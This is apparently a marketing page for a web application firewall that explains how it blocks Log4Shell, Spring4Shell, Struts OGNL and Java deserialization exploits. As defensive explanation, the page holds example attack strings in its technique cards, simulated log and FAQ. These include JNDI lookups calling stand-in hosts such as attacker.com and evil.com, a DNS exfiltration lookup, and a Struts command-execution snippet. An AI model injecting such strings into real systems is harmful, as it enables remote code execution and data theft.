Block Log4Shell & CVE Exploits with WAF — Instant Virtual Patching

OWASP A06:2021

When Known Vulnerabilities Become Active Exploits

Log4Shell shook the internet in December 2021. A single JNDI lookup string — ${jndi:ldap://attacker.com/exploit} — injected into any logged input could give an attacker full remote code execution. The vulnerability existed in Apache Log4j 2, embedded in millions of Java applications, from enterprise platforms to Minecraft servers. Exploitation began within hours of disclosure, and attackers are still scanning for unpatched systems today.

10.0 CVSS score — the maximum severity rating, assigned to Log4Shell (CVE-2021-44228)

But Log4Shell is just one example. Spring4Shell (CVE-2022-22965), Apache Struts RCE (CVE-2017-5638), and Java deserialization exploits follow the same pattern: a disclosed vulnerability, a public exploit, and a race between attackers and defenders. Virtual patching at the WAF level stops the exploit immediately — buying you time to patch properly.

OWASP A06:2021 CWE-502 (Deserialization) CVE-2021-44228 CVE-2022-22965

How Attackers Exploit Known CVEs

These are the most dangerous CVE exploitation techniques targeting web applications today.

🔥

Log4Shell JNDI Injection

Injecting ${jndi:ldap://} into any logged field — headers, parameters, user agents — to trigger remote code execution via Log4j.

${jndi:ldap://evil.com/exploit}

🌿

Spring4Shell RCE

Exploiting Spring Framework's data binding to manipulate the classLoader and write a web shell to the server via crafted HTTP parameters.

class.module.classLoader.URLs

📦

Apache Struts Exploits

Targeting Struts OGNL expression injection (CVE-2017-5638) through manipulated Content-Type headers to achieve remote code execution.

%{(#cmd='id').execute()}

💣

Deserialization CVEs

Sending crafted serialized objects to Java endpoints (Commons Collections, Jackson, Fastjson) that execute arbitrary code upon deserialization.

rO0ABXNy... [malicious gadget chain]

⚠️

Library Zero-Days

Exploiting newly disclosed vulnerabilities in popular libraries before vendors release patches — targeting the window between disclosure and remediation.

CVE-202X-XXXXX → exploit within hours

How PowerWAF Stops CVE Exploits

Five protection layers that shield your applications from known and emerging vulnerabilities.

🛡️

JNDI Pattern Blocking

Deep inspection of every request field for JNDI lookup patterns — including obfuscated variants like ${${lower:j}ndi:}, nested lookups, and URL-encoded payloads.

Stops Log4Shell and JNDI-based RCE

🔩

CVE Virtual Patching

Pre-built rules for critical CVEs deployed automatically. Blocks exploitation of Spring4Shell, Struts OGNL injection, and hundreds of known vulnerabilities without code changes.

Stops known CVE exploits instantly

🔍

Payload Deobfuscation

Decodes URL encoding, Unicode escapes, Base64, nested expressions, and multi-layer obfuscation before analysis — catching evasion techniques that bypass simple pattern matching.

Stops obfuscated and encoded exploits

📡

Threat Intelligence Feed

Continuously updated rules from CVE databases, exploit-db, and active threat monitoring. New virtual patches are pushed to all instances within hours of critical disclosures.

Stops emerging and zero-day CVEs

🧠

Serialization Guard

Inspects serialized payloads for known gadget chains, dangerous class instantiations, and suspicious object patterns — blocking Java deserialization attacks at the edge.

Stops deserialization-based RCE

Protected in Minutes, Not Months

No code changes. No emergency patch cycles. No downtime.

Point DNS

Route traffic through PowerWAF by updating your DNS records. No server changes needed.

→

Instant CVE Protection

PowerWAF immediately blocks Log4Shell, Spring4Shell, and all known CVE exploits in real time.

→

Patch on Your Schedule

Virtual patching buys you time. Plan and test vendor patches properly while your app stays protected.

Critical for Java applications, Spring-based services, and any system running vulnerable libraries that can't be patched immediately.

See PowerWAF in Action

Real-time view of CVE exploit attempts being detected and blocked at the edge — before they reach your application.

powerwaf-access-log — live

09:41:02 BLOCKED 198.51.100.87 GET /api/search → Log4Shell: ${jndi:ldap://evil.com/x} in User-Agent

09:41:03 BLOCKED 198.51.100.23 POST /login → Log4Shell: ${${lower:j}${::-n}di:rmi://c2.io/a} in username

09:41:04 ALLOWED 203.0.113.50 GET /dashboard → Authenticated user session

09:41:05 BLOCKED 203.0.113.42 POST /spring-app/user → Spring4Shell: class.module.classLoader.URLs[0]

09:41:06 BLOCKED 198.51.100.87 POST /struts2-showcase/ → Struts OGNL: %{(#cmd='whoami')} in Content-Type

09:41:07 ALLOWED 198.51.100.12 POST /api/orders → Valid API request

09:41:08 BLOCKED 198.51.100.23 POST /api/data → Java deserialization: gadget chain in request body

09:41:09 ALLOWED 203.0.113.50 GET /reports → Legitimate report request

09:41:10 BLOCKED 203.0.113.42 GET /app/search?q=${jndi:dns://exfil.io/leak} → Log4Shell DNS exfil attempt

09:41:11 BLOCKED 198.51.100.87 POST /api/import → Fastjson RCE: autoType bypass in JSON body

Simulated log showing how PowerWAF blocks CVE exploitation attempts while allowing legitimate traffic through.

Proven Protection at Scale

< 24h Virtual patch deployment for critical CVEs after disclosure

500+ CVE-specific rules actively maintained and updated

0 Code changes required to protect against new CVEs

Real-World Scenarios

Log4Shell Zero-Day Response

When Log4Shell was disclosed, organizations scrambled to identify every Log4j instance across their infrastructure. PowerWAF customers were protected within hours — JNDI injection patterns were blocked at the edge while teams mapped their exposure and planned remediation.

Spring Framework Upgrade Blocked by Dependencies

A Spring Boot application can't upgrade to a patched version because critical dependencies haven't been updated yet. PowerWAF's virtual patch blocks Spring4Shell exploitation attempts while the development team waits for compatible library releases.

Enterprise Java Platform with Complex Patch Cycles

Large enterprises running Java EE application servers need weeks or months to test and deploy patches. PowerWAF provides immediate protection against known CVEs, letting security teams enforce patching SLAs without leaving the application exposed.

Protects applications built with

Java / Spring

Apache Struts

Apache Tomcat

JBoss / WildFly

Node.js

PHP / Laravel

WordPress

Drupal

Python / Django

Custom Apps

Frequently Asked Questions

What is Log4Shell (CVE-2021-44228)?

Log4Shell is a critical remote code execution (RCE) vulnerability in Apache Log4j 2, a widely used Java logging library. Attackers exploit it by injecting JNDI lookup strings like ${jndi:ldap://attacker.com/payload} into any logged input — HTTP headers, form fields, user agents, or URL parameters. When Log4j processes the string, it fetches and executes remote code, giving the attacker full control of the server. It received the maximum CVSS score of 10.0 and affected millions of applications worldwide.

How does PowerWAF block Log4Shell attacks?

PowerWAF blocks Log4Shell by inspecting every HTTP request — headers, parameters, body, cookies, and user agent — for JNDI injection patterns. This includes plain ${jndi:ldap://}, obfuscated variants like ${${lower:j}ndi:}, nested lookups, URL-encoded payloads, and Unicode escape sequences. PowerWAF strips or blocks these payloads at the edge before they ever reach your Log4j instance, providing immediate protection without patching.

Can PowerWAF protect against Spring4Shell (CVE-2022-22965)?

Yes. PowerWAF includes specific rules for Spring4Shell that block the classLoader manipulation patterns used in this exploit. It detects and blocks requests containing class.module.classLoader payloads, parameter binding attacks targeting Spring MVC, and related RCE attempts — shielding your Spring applications without requiring framework upgrades.

Do I need to patch my servers if I use PowerWAF?

PowerWAF provides immediate protection through virtual patching, but we always recommend applying vendor patches when available. Virtual patching buys you critical time — blocking exploits at the edge while you plan and execute your patching cycle. This is especially valuable for complex environments where patching requires testing, downtime windows, or coordinating across multiple teams.

How quickly does PowerWAF add rules for new CVEs?

PowerWAF's threat intelligence team monitors CVE disclosures, exploit databases, and active campaigns continuously. For critical vulnerabilities like Log4Shell, virtual patch rules are deployed within hours of disclosure — often before vendor patches are available. Rules are pushed automatically to all PowerWAF instances, so you're protected without any manual intervention.

What CVEs does PowerWAF protect against?

PowerWAF maintains an actively updated rule set covering critical CVEs across major frameworks and libraries: Log4Shell (CVE-2021-44228), Spring4Shell (CVE-2022-22965), Apache Struts vulnerabilities (CVE-2017-5638, CVE-2018-11776), Java deserialization exploits, known CMS vulnerabilities in WordPress, Drupal, and Joomla, and emerging zero-day exploits. The rule set is continuously expanded as new threats are disclosed.

Explore More WAF Protection

PowerWAF covers the full OWASP Top 10. Explore protection for other attack categories.

Block CVE Exploits Before They Hit Your Server

No credit card required. No code changes. Virtual patching active in under 5 minutes.

Start with a Free Plan See Prices

Limited free plan spots available

Block Log4Shell & CVE Exploits — Instant Virtual Patching